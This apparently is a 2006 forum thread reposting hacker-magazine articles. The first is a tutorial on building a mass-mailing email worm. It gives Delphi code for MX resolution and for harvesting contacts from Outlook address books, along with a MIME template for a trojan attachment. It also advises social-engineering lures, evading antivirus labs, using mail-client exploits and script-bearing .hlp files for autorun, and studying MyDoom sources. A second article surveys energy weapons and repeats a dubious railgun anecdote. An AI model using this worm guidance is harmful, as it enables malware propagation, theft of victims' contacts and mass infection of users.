Допустим, нам удалось создать аттач, который проходит все mail-фильтры и успешно попадает к пользователю. Теперь возникает задача заставить юзера его запустить. Издавна для этого используют социальную инженерию, то есть обычный развод. Для этого в письме пишут, что оно содержит security updates или еще какою-нибудь полезную программу. Также распространен метод создания в архивах файлов с двойными расширениями, при этом файл обычно имеет расширение .xls [очень много пробелов].exe и иконку документа Microsoft Exсel. Часто трояны в аттачах имеют расширение .pif, которое не отображается в эксплорере даже тогда, когда включено отображение расширений всех файлов.

Что такое червь и как он должен работать, думаю, тебе понятно. Теперь приступим непосредственно к рассмотрению технических вопросов, которые возникают в процессе создания беспозвоночных.

[релеинг и резолвинг]

Проблема №1, которую нам нужно решить - это сама отсылка копии червя на e-mail адрес. В статье «Методы управления RAT», в июльском номере, я рассматривал процесс отправки мыла через SMTP-сервер mail.ru. Такой метод отправки подходит для различных парольных троянов, но для массовой рассылки червей неприменим. Потому что для его работы нужно иметь один или несколько постоянно работающих SMTP-серверов, через которые будет идти почта. Я думаю, ты уже понял, что такие серверы мгновенно прикроют доступ к себе, как только червя обнаружат, да и вряд ли какой-то SMTP сможет выдержать нагрузку, даваемую тысячами распространяющихся червей. Поэтому нам нужно отправлять почту, минуя центральный SMTP-сервер.

Что происходит с письмом, отправленным через какой-нибудь smtp.mail.ru? В этом случае сервер маил.ру работает, как SMTP Relay, то есть как перенаправитель сообщения от клиента на SMTP-сервер получателя. А зачем в цепочке рассылки лишний элемент, ведь можно отправлять почту напрямую получателю, минуя SMTP Relay. Как же нам узнать адрес SMTP сервера получателя? Это очень просто! Адрес SMTP, принимающего почту в каком-либо домене всегда определяется соответствующей MX-записью для этого домена на DNS-серверах.

Для начала нам нужно сделать резолвинг MX-записи нужного домена. Реализуется это двумя способами.

Первый - написание своего DNS Resolver'а, который бы формировал запрос, посылал его серверу, принимал и декодировал ответ. Второй - использовать для этого DNS API. Второй вариант, конечно, гораздо проще, но он имеет один большой недостаток - функции DNS API появились только в Windows 2000 Professional (в не Pro версиях они отсутствуют!), а так как основным контингентом пользователей, заражаемых почтовыми червями, будут ламеры, сидящие на старых и необновленных системах, то такой метод резолвинга лучше не использовать. Однако для ознакомления с DNS API, я приведу код, резолвящий MX-записи.

function MXResolve(Domain: PChar): string;

var

pQueryResultsSet: PDNS_RECORD;

HostEnt: PHostEnt;

Name: PChar;

begin

pQueryResultsSet := nil;

if DnsQuery(Domain, DNS_TYPE_MX, DNS_QUERY_STANDARD, nil, @pQueryResultsSet, nil) = 0 then

begin

Result := pQueryResultsSet^.Data.MX.pNameExchange;

GlobalFree(dword(pQueryResultsSet));

end;

end;

Как ты видишь, резолвить с помощью DNS API проще простого, но так как этот метод не всегда приемлем, перейдем к рассмотрению следующего метода.

[ручной DNS резолвинг]

Я попытаюсь рассказать немного о DNS-протоколе. Я не ставлю перед собой цели подробно рассказывать обо всей системе, но попытаюсь дать основные понятия, необходимые для понимания этого протокола. Подробно ты можешь все прочитать в документации RFC 1034 и 1035.

DNS-запросы бывают разного типа. Тип запроса имеет числовое значение от 1 до 16 и определяет информацию, которую вы желаете получить. Номер типа ответа всегда соответствует номеру типа запроса, чтобы знать, что и к чему относится. Вот основные типы DNS-запросов:

01 A host address (IP адрес хоста)

02 NS authoritative name server (NS сервер)

03 MD mail destination (устар.тип, сейчас юзают MX)

04 MF mail forwarder (устар.тип, сейчас юзают MX)

05 CNAME the canonical name for alias

06 SOA marks of a start of zone of authority

07 MB (experimental)

08 MG (experimental)

09 MR mail rename domain name (experimental)

10 NULL a null RR

11 WKS a well known service description

12 PTR a domain name pointer

13 HINFO host information

14 MINFO mail box or mail list information

15 MX mail exchange

16 TXT text string

Из них нас интересуют только MX-записи, имеющие номер 15. Наряду с типом запроса, существует еще и класс запроса. Это связано с тем, что протокол DNS универсален и может работать практически в любых сетях, а не только в TCP/IP. Так как другие сети нам не понадобятся, нас будет интересовать только один класс запросов - IN (=1), который предназначен для использования в Интернете. Пакет запроса имеет следующий вид:

Packet Length - 2 байта

Query/Response header - 12 байтов

Question - нет фиксированной длины, зависит от количества вопросов

Answer - формируется сервером, нет фиксированной длины

Authority - формируется сервером, нет фиксированной длины

Additional - формируется сервером, нет фиксированной длины

Запрос должен включать в себя Length, Header и Question, а ответ может иметь все поля, но поле Answer в нем является обязательным.

Теперь определим структуру, описывающую заголовки Query/Response header:

TDNSHeader = packed record

qryID : word; - идентификатор запроса

options: word; - флаги

qdcount: word; - счетчик записей в поле Question

ancount: word; - счетчик записей в поле Answer

nscount: word; - счетчик записей в поле Authority

arcount: word; - счетчик записей в поле Additional

end;

TQueryType = packed record

QType : word; - тип запроса

QClass: word; - класс запроса

end;

Чтобы получить адрес SMTP-сервера, куда мы хотим послать письмо, мы должны составить запрос, послать его, принять и декодировать ответ. Со структурой запроса, я думаю, все понятно, давай теперь разберемся с возвращаемыми ответами, а для этого надо разобраться, что такое RR-записи. Они формируются NS-сервером и располагаются только в ответе и строго следом за полем запроса. То есть Answer и все последующие состоят из некоторого количества RR-записей различного формата. В них передаются в качестве информации и IP-адреса, и названия серверов, и просто текстовая информация. Подробно все типы этих записей приведены в RFC 1035, они довольно похожи друг на друга и различаются лишь мелкими деталями. Так что я буду говорить только об интересующих меня. Аббревиатура RR означает Resource Record (это официальное название из документа).

RR-запись выглядит так:

NAME up to 255 bytes + 1 ('\0')

TYPE 2 bytes (UINT)

CLASS 2 bytes (UINT)

TTL 4 bytes (signed 32 bits number - 'long')

RDLENGTH 2 bytes (UINT)

RDATA variable, depend on query

Где NAME - название хоста, к которому относится запись, TYPE - тип представляемой информации (о типах см. выше), CLASS - класс сети (в нашем случае всегда 'IN' (01)), TTL - время хранения информации в секундах, RDLENGTH - длина блока информации в байтах, RDATA - блок представляемой информации.

Самой главной проблемой при декодировании ответа будет разбор возвращаемых имен хостов. Имя хоста состоит из нескольких частей. Перед каждой частью ставится байт, определяющий ее длину. Например, www.microsoft.com будет выглядеть как 03 www 09 microsoft 03 com 00, имя всегда оканчивается нулевым байтом. Но самая главная фича не в этом, а в том, что имя может быть упаковано. Упаковывают имя, используя указатель, он представляет собой два байта, причем первый используется в качестве семафора, два старших бита этого семафора установлены в 1, а остальные не определены. Второй байт является смещением от начала запроса, то есть от первого байта идентификатора. Если байт длины равен $C0, то следующий за ним байт будет указателем (кошмар - прим. gorl'а). Напишем функцию, декодирующую такие имена:

function GetQName(var RecvData; Offset: Integer; var Pt: Pointer): string;

var

ChPt : PChar;

ReadBytes : Byte;

begin

Result := '';

ChPt := @RecvData;

Inc(ChPt, Offset + 1);

while ChPt^ <> '' do

begin

if ChPt^ = #$C0 then

begin

Inc(ChPt);

Result :=Result + GetQName(RecvData, Ord(ChPt^) - 1, Pt);

Break;

end else

begin

ReadBytes := Ord(ChPt^);

while ReadBytes > 0 do

begin

Inc(ChPt);

Result := Result + string(ChPt^);

Dec(ReadBytes);

end;

end;

Inc(ChPt);

if (ChPt^ <> '') then Result := Result + '.';

end;

Pt := ChPt;

end;

Так как объем статьи не позволяет рассмотреть процесс MX-резолвинга целиком, то я рассмотрю здесь только еще один важный момент - получение IP DNS-сервера, через который мы будем слать запросы. В этом нам поможет функция GetNetworkParams из iphlpapi.dll. Эта функция возвращает различную информацию о сетевых адаптерах, в том числе и адреса, связанных с ними DNS.

function GetDNSServer(): dword;

var

FixedInfoSize : Integer;

FixedInfo : PFixedInfo;

PDNS :PIPAddrString;

GetNetworkParams : function(FI:PFixedInfo; var BufLen: Integer): Integer; stdcall;

begin

Result := 0;

GetNetworkParams := GetProcAddress(LoadLibrary('iphlpapi.dll'),

'GetNetworkParams');

if @GetNetworkParams = nil then Exit;

FixedInfoSize := 1024;

GetMem(FixedInfo, FixedInfoSize);

if GetNetworkParams(FixedInfo, FixedInfoSize) = ERROR_SUCCESS then

begin

PDNS := @FixedInfo^.DNSServerList;

if PDNS <> nil then Result := inet_addr(PDNS^.IPAddress);

end;

FreeMem(FixedInfo);

end;

Работающий пример MX-резолвера ты можешь найти на диске.

[получение адресов для рассылки]

Перед тем как начинать рассылку копий червя, неплохо было бы определить адреса, по которым мы будем его рассылать. Для этого нам нужно сначала вытащить все адреса из адресной книги юзера, а затем и просканировать все файлы на дисках на их наличие.

Попробуем для начала достать адреса из адресной книги Outlook. Нужная нам информация хранится в .wab файлах, и в виду их простой стуктуры будет нетрудно их распарсить вручную. Вот пример кода, сохраняющего все адреса из wab-файла в файл Emails.txt:

procedure ReadWAB(WABFile: string);

var

F : file;

I : dword;

S : string;

N : array[1..5] of Char;

Buf : array[1..500] of Char;

R : TextFile;

begin

AssignFile(R,'Emails.txt');

ReWrite®;

AssignFile(F,WABFile);

Reset(F,1);

if IOResult=0 then begin

repeat

BlockRead(F,N,2);

if N[1]+N[2]=#03#48 then begin

BlockRead(F,Buf,Ord(N[2])+30);

S:='';

for I:=1 to Ord(N[2])+30 do S:=S+Buf[I];

Delete(S,1,3);

I:=Pos(#00#00#00,S);

if I>0 then SetLength(S,I-1);

for I:=1 to Ord(N[2]) do if S[I]=#00 then Delete(S,I,1);

for I:=1 to Length(S) do

if S[I]<chr(45) then begin

SetLength(S,I-1);

Break;

end;

if (Pos('@',S)>0)and(Pos('.',S)>0) then

writeln(r,UpperCase(S));

end else Seek(F,FilePos(F)-1);

until FileSize(F)-FilePos(F)<6;

CloseFile(F);

end;

CloseFile®;

end;

Ну, и совсем просто будет извлечь адреса из Windows Messenger, так как они просто хранятся в реестре, в разделе HKEY_CURRENT_USER\Software\Microsoft\MessengerService\ListCache\.NET Messenger Service, откуда их можно прочитать, просто перечислив соответствующие ключи. Как это сделать, я думаю, ты и сам догадаешься.

Следующим этапом после адресных книг будет поиск мыл в файлах на диске. Сделать это очень просто, поэтому приводить примеров я не буду, но подскажу, что для реализации этого тебе хватит API-функций FindFirstFile, FindNextFile, FindClose, CreateFile, ReadFile и CloseHandle, ну и еще обязательно понадобится немного мозгов (они пригодятся для того, чтобы сообразить, как использовать регулярные выражения для поиска мыл - прим. gorl'а). Конечно, помимо этого, можно извлекать адреса из адресных книг других программ, можно даже использовать кейлогер и отслеживать вводимые юзером данные, все эти приемы повышают эффективность червя и увеличивают скорость его размножения. Очень важный момент при получении списка адресов - это его фильтрация. Ты ведь не хочешь, чтобы твой червь сам отправился прямиком в лабораторию Касперского, поэтому следует сделать список слов-исключений, которые не должны встречаться в адресах, пригодных для рассылки. Все адреса с этими словами просто следует не включать в базу.

[cоздание аттачей в письме]

В статье про управление трояном я рассматривал простейшую отправку письма и процесс SMTP-чата, но не рассматривал процесс отправки аттачей в тексте письма. Начнем с того, что аттачи передаются не в бинарном виде, а в текстовом. Связано это с тем, что изначально SMTP/POP3 протоколы предназначались исключительно для передачи текста и работали не с байтами, а с 7-битными символами, что позволяло передавать только знаки латинского алфавита. Все символы, не попадающие в этот диапазон, обрезаются почтовым сервером до 7 бит, что вынуждает нас перед передачей кодировать бинарные данные в специальный формат. В свое время было придумано множество вариантов кодирования (UUE, XXE, Base64), но прижился и с успехом используется сейчас только формат Base64. Давай кратко рассмотрим принципы кодирования Base64.

Как известно, байт состоит из восьми битов. Один байт может принимать 256 значений: от 0 до 255. Однако если вместо восьми байт использовать только шесть, то объем вложенной информации уменьшается до 64 значений: от 0 до 63. Теперь главное: любую цифру 6-ти битового байта можно представить в виде печатного символа. 64 символа это не так много, ASCII-символов вполне хватит, что позволяет закодировать все данные в следующий набор:

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

А далее берутся три последовательных байта по восемь бит (всего 24 бита) и побитно делятся на четыре 6-ти битных байта (всего 24 бита).

Немного странно звучит, «шестибитный байт». На самом деле бит восемь, однако используются только 6 младших бит, два старших бита игнорируются. Основываясь на этом принципе, мы можем закодировать любую двоичную информацию в текст, не очень сильно увеличивая ее объем (на 30%). Затем наша информация через почтовый сервер попадет к нужному адресату, почтовик которого декодирует текст в двоичный файл.

Готовый пример Base64-кодирования ты найдешь на диске с журналом. Но просто вставить Base64-код в текст письма недостаточно. Для того чтобы почтовая программа распознала этот текст как аттач, нужно сформировать соответствующие заголовки. В начало письма обязательно нужно вставить заголовки MIME-Version и Content-Type, первый определяет версию MIME (мы будем использовать 1.0), а второй - тип содержимого письма и разделители между MIME-элементами. Перед самими Base64-данными должен быть вставлен блок, описывающий тип этих данных, имя файла в аттаче и тип его кодирования. Выглядеть это будет примерно так:


MIME-Version: 1.0

Content-Type: multipart/mixed; boundary="_===13023223====_"

--_===13023223====_

Content-Type: text/plain; charset="windows-1251"; format="flowed"

Content-Transfer-Encoding: 8bit

[Текст письма]

--_===13023223====_

Content-Type: application/octet-stream

Content-Disposition: attachment;

filename="trojan.exe"

Content-Transfer-Encoding: base64

[Здесь идут Base64 данные]

С тем, как добавить файл в аттач, я думаю, все понятно.

Так как все пересылаемые файлы мы будем паковать в архив, то давай разберемся, как можно его создать. Самым простым и лучшим способом будет использование внешнего архиватора, например, если на компе юзера установлен WinRar, то архив создается всего одной строкой: WinExec('rar.exe a -r data.rar trojan.exe', SW_HIDE). Подобным образом можно использовать и другие архиваторы, но, к сожалению, не у всех на компе стоит хоть какой-нибудь архиватор. В таком случае нам ничего не остается, кроме как создавать архивы вручную. Но так как париться со сжатием, я думаю, тебе не хочется, то будем использовать библиотеку MadZip, которая позволяет полноценно работать с ZIP-архивами, и при этом добавляет в исполнимый файл всего 20 Кб веса. Библиотека как всегда на диске с журналом, с ней очень легко разобраться, честное слово.

Итак, суть работы червей и некоторые моменты их реализации я постарался здес описать. Приведенной здесь информации, конечно, недостаточно для того, чтобы вызвать новую эпидемию, но все что для этого нужно ты можешь легко изучить сам (но не в коем случае не делай этого - это плохо!). Для начала советую найти в сети исходники Beagle и MyDoom и внимательно их изучить, затем прочесть и понять RFC на SMTP и MIME-протоколы. Нужно разбираться в психологии для того, чтобы заставить большое количество юзеров запустить аттач. И весьма неплохо было бы добавить к червяку какой-нибудь полиморф. Но я все равно надеюсь, что новой эпидемии не будет, так как каждый, кто разберется в этой теме до конца, не станет тратить свои знания на бесполезное уничтожение, а лучше использует их для написания общественно полезного софта. Верно? wink.gif

[автозапуск аттача]

Недостаток большинства мыльных червей в том, что для их запуска нужны действия пользователя. Но этого можно избежать, если использовать уязвимости в почтовом ПО. Наиболее популярный в народе почтовый клиент - Outlook Express при просмотре html-писем использует движок Internet Explorer. Всем известно, что этот движок отличается исключительной дырявостью. На IE было выпущено множество эксплойтов, запускающих код на уязвимой машине, и большинство их можно использовать для автозапуска червя при открытии письма! За такую замечательную возможность нам нужно поблагодарить Билла Гейтса, а разработчикам IE нужно памятник при жизни поставить за то, что они сделали в нем много удобных для использования дыр smile.gif.

Очень странно, что эту возможность использует очень мало червей. Как пример можно привести червя Winevar. Червяк этот очень старый (еще 2002 года), но отличается от большинства других червей тем, что использует дырку iFrame и запускается при просмотре письма в окне быстрого просмотра Outlook. Это, конечно, круто, но есть возможность лучше. Наверное, ты слышал о существовании jpeg-эксплойта. Существование этого эксплойта связано с ошибкой в обработке jpeg-файлов в системной библиотеке, что позволяет заразить комп через любую программу, показывающую jpeg-картинки! Это можно использовать не только в Outlook, но и в других почтовых клиентах, таких как TheBat или Eudora. На диске ты найдешь исходник этого эксплойта, но, к сожалению, в настоящее время он срабатывает мало у кого.

Эксплойты - это, конечно, хорошо, но, к сожалению, не всегда можно найти что-то реально рабочее, поэтому стоит присмотреться к другим методам маскировки червя в письме. Если в письма слать exe-файл, то мало кто его запустит, так как юзеры стали осторожнее. Но большинство из них даже не подозревает, что опасность может скрываться в .hlp- и .chm-файлах. Одна из малоизвестных возможностей help-файлов - выполение сценариев на простом скриптовом языке, причем эти сценарии позволяют запускать исполнимые файлы. Эту возможность можно использовать с высокой эффективностью, так как доверия к hlp-файлам намного больше, чем к exe. Help-файлы можно создавать в Help Workshop (входит в состав MS Visual Studio 6). Инфу по скриптовому языку можно прочитать в документации к этой программе. В качестве демонстрации этого метода на диске лежит help-файл, запускающий cmd.exe. Но не составит никакого труда сделать хэлп, который форматирует винт wink.gif.



Автор: Metallica Dec 12 2006, 17:39

Из лазера по банкамВооружение века хай-тек

Стараниями писателей-фантастов и голливудских киношников роль вооружения будущего прочно закрепилась за энергетическим оружием. Это те самые бластеры, лазеры, лучеметы и прочие штуковины, стреляющие мощными потоками частиц, разрядами, электромагнитными излучениями и другими бестелесными субстанциями. Их главным преимуществом перед пулями и снарядами является мгновенное поражение цели. Идея квантового скачка в новую эру вооружений давно занимает умы военных. В сегодняшнем обзоре читай о самом интересном футуристическом оружии и перспективах модернизации классики.

Последние десятилетия кипит работа над прототипами разнообразного энергетического оружия, проводятся его испытания. Законы физики ставят перед современными технологиями такие барьеры, преодоление которых требует нереальных экономических затрат. Пушки стоимостью более 100 миллиардов долларов за штуку не по карману даже Пентагону. Больше всего денег вбухано в космические системы. Однако об их реальном боевом применении говорить пока рано. Ближе всех к практической реализации оказались мощные наземные и корабельные установки средней дальности. Но и они пока воспринимаются как очень и очень дорогие игрушки. Идеи индивидуального энергетического оружия на деле являются далекими и фантастическими.

Лазер с лазерным прицелом

Области применения лазеров необозримы. Куда ни сунься - кругом лазеры. Они используются в медицине, связи, электронике и голографии. Хотя физическая суть у всех лазеров общая, принципы работы, как и возможности, различаются. Военные ценят способность лазеров концентрировать огромную энергию в очень узком луче. Это реально высокоточное оружие. На дальности 10 километров можно получить пятнышко диаметром всего 1 сантиметр. При этом твердотельный лазер мощностью всего 10 киловатт способен создавать луч с плотностью энергии в миллионы раз большей, чем на поверхности Солнца. Промышленные лазеры уже сегодня, как масло, режут стальные и титановые листы. Почему же карманный гиперболоид инженера Гарина до сих пор остается несбыточной мечтой?

В первую очередь, нужна энергия для накачки лазера. Чтобы получить пару десятков киловатт при КПД 20%, придется таскать с собой дизель-генератор весом несколько тонн. Остальные 80% будут расходоваться на тепло, которое необходимо отводить, иначе агрегат просто расплавится вместе со стрелком. Вентиляторами и водичкой тут не обойтись. Кроме того, сами фокусирующие устройства должны иметь приличные размеры для наименьшего расхождения луча на больших дальностях. Установкам необходим еще и точный прицел, желательно лазерный. Шмалять наугад основным лучом – дело бесперспективное.

Футурологи уверенно предсказывают изобретение компактных источников большой энергии. Действительно, в недрах атомных ядер и в химических реакциях скрыта колоссальная энергия, которую нужно лишь аккуратно высвободить. Но пока это удается сделать только в сопровождении взрыва. Правда, есть атомные электростанции, но они еще очень далеки от компактности. Сегодня о боевых лазерах можно говорить лишь как о стационарных вариантах для средств, способных нести многотонные силовые установки, – кораблей, самолетов, космических платформ.

Первые серьезные испытания мощных лазеров класса «земля - воздух» проводились Пентагоном в начале 80-х годов. На полигоне Уайт Сэндс в Нью-Мексико была наглядно продемонстрирована возможность поражать баллистические ракеты. Химический лазер MIRACL мощностью 2 мегаватта с расстояния 1 км дырявил неподвижно закрепленную вторую ступень ракеты Titan-1, раскрашенную под советскую с соответствующей маркировкой. Чтобы сильнее бабахнуло, «Титана» накачали сжатым газом. За 12 секунд «Чудо» так нагрело ракету, что, по словам руководителя программы СОИ, «лазер разнес эту штуковину буквально на куски».

За 20 лет американцы доросли до первого тактического лазера, приспособленного для реального боевого применения. Совместно с израильтянами они совершенствуют мобильную систему MTHEL (проект «Наутилус»). Установка неоднократно была опробована в деле. Она успешно сбивает реактивные снаряды «Хезболла». Близки к завершению и разработки твердотельных лазеров для поражения наземных и воздушных целей. Эти аппараты можно будет перевозить на джипе. Разрабатываются самолетные лазеры большой мощности.

Советский Союз экспериментировал с боевыми лазерами с 70-х годов. В подмосковном Троицке был создан газовый лазер мощностью 1 мегаватт. Установка, аналогичная MIRACL, была построена в Таджикистане. Существовали и другие проекты. В 1987 году ракетой-носителем «Энергия» на орбиту была выведена 80-тонная боевая лазерная станция «Скиф-ДМ» («Полюс»). Но с замораживанием гонки вооружений эксперименты по стрельбе в космосе были отменены. К великой радости американцев, у которых до сих пор нет средств доставки на орбиту таких гигантских конструкций. «Скиф-ДМ» затопили в Тихом океане.

Спутники-шахиды

Космические лазеры, поражающие баллистические ракеты противника за тысячи километров, теоретически будут еще больше в размерах. Так, химические лазеры для накачки требуют тонны топлива, охлаждающего вещества и компонентов самого рабочего тела, которое расходуется при каждом выстреле. Фокусирующие зеркала должны быть большими и весьма тяжелыми. Самыми мощными из таких лазеров являются так называемые газодинамические. По сути, это реактивные двигатели, где молекулы фтористого водорода ускоряются до сверхзвуковых скоростей. Такой выхлоп нарушает привычные представления о том, что у лазеров не бывает отдачи. В открытом космосе один выстрел унесет всю платформу вместе с лазером в очень далекое путешествие. Для компенсации реактивного импульса понадобятся дополнительные двигатели и много топлива.

Между прочим, проблема отдачи была решена советскими инженерами еще в 70-х годах. Каким образом – военная тайна ;-). Конструкторы ухитрились установить на пилотируемую станцию «Алмаз» 30-миллиметровую авиационную пушку Нудельмана для отстрела вражеских звездолетов при сближении. Космонавты даже успешно из нее постреляли, сохраняя орбиту и точную ориентацию станции.

Для звездных войн Пентагон готовит рентгеновские лазеры с ядерной накачкой. Они достаточно мощные, но намного компактнее химических. У этих лазеров только один «маленький» недостаток – одноразовость. Мощный импульс излучения рентгеновских лазеров формируется в момент взрыва небольшого термоядерного заряда. Мировое сообщество всеми силами препятствует выводу на орбиту любых ядерных установок. Поэтому запускать такие платформы Пентагон рассчитывает непосредственно при начале ракетной атаки противника. Существует вариант «ронять» спутники на цели с последующим термоядерным взрывом.

Хирургия глаза

Вспоминаю свое первое знакомство с лазером, когда еще не было ни сидиромов, ни эксимеров и лазерные указки не продавались в каждом ларьке. На лабораторном занятии я подносил стеклянную призму в красивый рубиновый луч лазера и отклонял его в открытое окно соседнего здания. За что был наказан преподавателем-подполковником, так как вполне мог засветить кому-нибудь в глазик. Мощности тех лазеров хватало лишь на пробивание дырок в копировальной бумаге для последующих замеров штангенциркулем (проверяли расходимость луча). Однако ожог сетчатки при «удачном» попадании был почти гарантирован.

Вряд ли у тебя получится сконструировать самодельный лучемет, разобрав старый сидюк или даже резак, который на раз прожигает болванки. Чтобы полупроводниковый лазер мощностью около 30 милливатт повредил глаз, нужно обеспечить прямое попадание в зрачок. А для этого придется пялиться непосредственно в выходное отверстие лазера. Прицельное наведение в глаза выполнить непросто. Инфракрасный луч невидим, хотя очень опасен. Светить лазером в дверные глазки бесполезно, так как пластиковая оптика для этого диапазона непрозрачна. В случае с приличной оптикой, например, в приборах ночного видения снайперов, в танках и самолетах, ослепить можно по полной программе.

Женевская конвенция запрещает создание и использование ослепляющего оружия, считая его зверским. США ратифицировали соответствующий протокол в 1999 году, и, по идее, должны были снять с вооружения подствольный лазер Sabre 203, прикрепляемый к винтовке M-16. Эта штука пускала красные зайчики с гарантией ослепления на дальности до 300 метров. Запрет имеет оговорки. Так, если в самолет ударил луч боевого лазера с намерением просверлить в нем дырку, но попал при этом в глаз летчику, никаких нарушений усмотрено не будет. Лазейку активно используют. В 2001 году российские ученые создали более мощный и универсальный аналог Sabre 203, позиционируя его как инструмент борьбы с террористами. Кроме подствольного, он существует в самостоятельном варианте с телескопической оптической системой.

Все пучком

Современные лазеры являются наиболее проработанным видом энергетического оружия. Остальные находятся на стадии идей, теоретических изысканий и экспериментов. Следует выделить пучковое оружие. Его поражающая сила заключена в высокоэнергетических элементарных частицах - электронах, протонах и нейтронах, разгоняемых с помощью линейных ускорителей - синхрофазотронов. Разрушительная мощь таких потоков может быть очень велика, значительно больше, чем у световых квантов. Механизм воздействия отличается от лазерного. В то время как лазер сначала должен пробить поверхность (оболочку) объекта, элементарные частицы проникают вглубь вещества и нарушают работу цели изнутри.

Поток частиц со скоростями, близкими к световой, мгновенно уничтожает цель на расстоянии нескольких километров. Однако эксперименты показали, что частицы неслабо нагревают воздух. Воздух ионизируется, и электрические силы закручивают пучок, который при этом может свернуться в кольцо. Все равно что стрелять из автомата в ванной комнате. Чтобы этого не произошло, можно, например, пробить для пучка канал к цели при помощи мощного лазера.

Синхрофазотрон – вещь серьезная. Помимо наземных вариантов, разместить такую дуру весом в десятки тонн можно разве что на авианосце. Военные моряки намерены использовать боевые ускорители частиц для поражения противокорабельных крылатых ракет.

Плазменные клизмы

Плазма, она же ионизированный газ, – четвертое агрегатное состояние вещества, самое распространенное во Вселенной. Агрегаты, способные вырабатывать высокотемпературную плазму, вполне можно использовать как оружие. Это будет похоже на очень мощный огнемет (фактически огонь – это тоже плазма). Получается плазма довольно легко - при электрических разрядах, при горении и взрывах, других высокотемпературных воздействиях на вещество.

Интересно, что плазма образуется при функционировании многих давно известных видов оружия. Кумулятивная граната при взрыве формирует мощную струю высокотемпературной плазмы, которая мгновенно делает в толстой броне танка дыру. В рекламных целях такое оружие стали называть плазменным. Взять, к примеру, пресловутые плазменные панели, к которым больше подходит термин «газоразрядные». Скорее, это просто дань хай-теку. Скоро лампы дневного света будет принято называть плазменным освещением, а примус – плазменным нагревателем.

Из новейших средств можно отметить безгильзовую электротепловую химическую пушку. Стреляет она обычными или специальными боеприпасами. По сути, это древняя пушка с запалом. Высоковольтный разряд превращает зажигательную смесь в плазму и выталкивает заряд с огромной скоростью.

Полицейский бесконтактный электрошокер StunStrike компании Xtreme Alternative Defense Systems, в отличие от классических тазеров, не требует дротиков-электродов с проводами. В сторону жертвы выстреливается узкий пучок специальной аэрозоли. Аэрозоль ионизируется, образуя пространственный проводник для высоковольтного разряда. Дальность действия составляет 15 метров.

Среди глобальных идей можно назвать буржуинский проект по формированию многокилометровых ионизированных облаков-плазмоидов в верхних слоях атмосферы. Предполагается, что они будут парализовывать радиосвязь, работу электроники и даже воздействовать на здоровье людей. Аналогичный проект разрабатывается в НИИ Радиоприборостроения под руководством академика Авраменко. Цель наших плазмоидов – создание препятствий на пути ракет и других летящих объектов.

Сказочные звуки

Шумовое оружие американцы планировали применить в Ираке. Звуковая пушка Long Range Acoustic Device (LRAD) поражает противника направленным лучом пронзительного визга с уровнем до 130 децибел и частотой от 2 до 3 кГц. Это слегка превышает уровень болевого порога и сравнимо с реактивным двигателем над ухом или концертом Iron Maiden ;-). Ранее подобные установки использовались на военных кораблях для распугивания рыболовецких шхун.

Не утихают споры и вокруг инфразвукового оружия. Колебания воздуха на частотах в диапазоне 3-10 Гц, как известно, могут входить в резонанс с внутренними органами человека, вызывать их вибрацию и повреждения. При этом люди и животные ощущают чувство немотивированного страха и паники. Говорят, где-то в секретных бункерах пытались подобрать частоты для нейтрализации половых органов человека. Такой вариант тоже может в каком-то смысле деморализовать личный состав неприятеля. В любом случае, аэродинамические агрегаты для создания мощного инфразвука будут иметь большие размеры. Воздействие невозможно локализовать в одном направлении. Затыкать уши здесь бесполезно. Поражены будут все, включая оператора установки.

Пушки на магнитах

Немецкий журнал Soldat und Technik недавно поведал о таинственном происшествии в Ираке. Знаменитый американский танк «Абрамс» был прошит насквозь. В обеих стенках башни из суперпрочной антикумулятивной брони образовалось аккуратное отверстие диаметром всего 7 миллиметров! Такое не под силу ни одному оружию на Земле, за исключением... Вывод был таков – либо это инопланетяне, либо так называемая электромагнитная, или рельсовая, пушка. Глава специальной комиссии ЦРУ Чарльз Дефлер подтвердил, что найдены секретные документы, касающиеся проекта создания railgun в Ираке.

Разработка такой пушки велась в США, СССР и других странах с 70-х годов. Установка весит до 100 тонн и имеет длину до 100 метров. Суть механизма проста. По двум направляющим рельсам подается мощный импульс тока. Между рельсами движется тележка-снаряд, которая разгоняется под действием силы Лоренца. Фактически, это линейный электродвигатель постоянного тока. Конструкция должна быть очень точно просчитана, иначе снаряд, не успев разогнаться, испарится под действием огромного наведенного тока.

Технология позволяет разгонять снаряды до гиперзвуковых скоростей. На испытаниях в США были получены скорости более 4 км/с. В перспективе электромагнитные пушки смогут обеспечить метание самонаводящихся снарядов массой около 3 кг на дальность до 5000 км со скоростью 35 км/с. При этом длина пушки составит 45 м. Обычные пороховые заряды на такое не способны даже теоретически. Замечательным свойством рельсовых пушек является высокая скорострельность и способность стрелять очень легкими снарядами. Railgun может на огромном расстоянии «плеваться» кусочками плазмы весом менее одного грамма.

Народной разновидностью электромагнитных пушек являются ружья Гаусса. Они гораздо ближе к квейковской рельсе по габаритам. Принцип действия немного другой. На стволе устанавливается несколько электромагнитных катушек с питанием от предварительно заряженных конденсаторов. Они втягивают снаряд, например гвоздь, последовательно включаясь и отключаясь по мере его прохождения по стволу. Такие ружья могут пробивать бутылки и фанеру. Описаний конструкций в интернете множество, в том числе на сайте ][ (www1.xakep.ru/post/13054/default.asp). Очень симпатичные пистолеты Гаусса делает Евгений Васильев из Пскова (www.pskovinfo.ru/coilgun).

Заключение

Побочным продуктом пентагоновских научных изысканий оказалась такая полезная штуковина, как интернет. Я надеюсь, что параллельные мирные открытия, включая мощные источники халявной энергии, похоронят у человечества всякое желание воевать. Беда в том, что вояки будущего растут на сегодняшних компьютерных шутерах. Когда все эти палсганы, шок-райфлы, флэки и прочие бластеры и лазеры станут реальностью, под знамена армии будущего встанут геймеры. Миллионы воинов с великолепными навыками владения новым вооружением и знанием тактики ведения боя в различных условиях. Однажды мир на Земле будет в твоих руках. Дай мне слово: если стрелять, то только по банкам. Из лазера.

«- Я марсианин! - сказал он глуховатым голосом. - Всем оставаться на местах, иначе пущу в ход аннигилирующий бластер с фамагустой».

Георгий Шах. «О, марсиане!»

«...Кучера в асбестовых латах и царевы доезжачие с мотопомпой набросились на обезумевших чудовищ, нанося им удары прикладами лазеров и мазеров».

Станислав Лем. «Кибериада. Путешествие второе».

INFO

Рекомендую книгу Шмыгина А.И. «СОИ глазами русского полковника», 2000 г. Текст можно найти в интернете.

DANGER

Если инопланетяне вдруг презентуют тебе мощный ручной лазер, не стреляй там, где накурено или много пыли. Сгоришь.



Автор: Metallica Dec 14 2006, 11:04

Новости аудиоманьяков

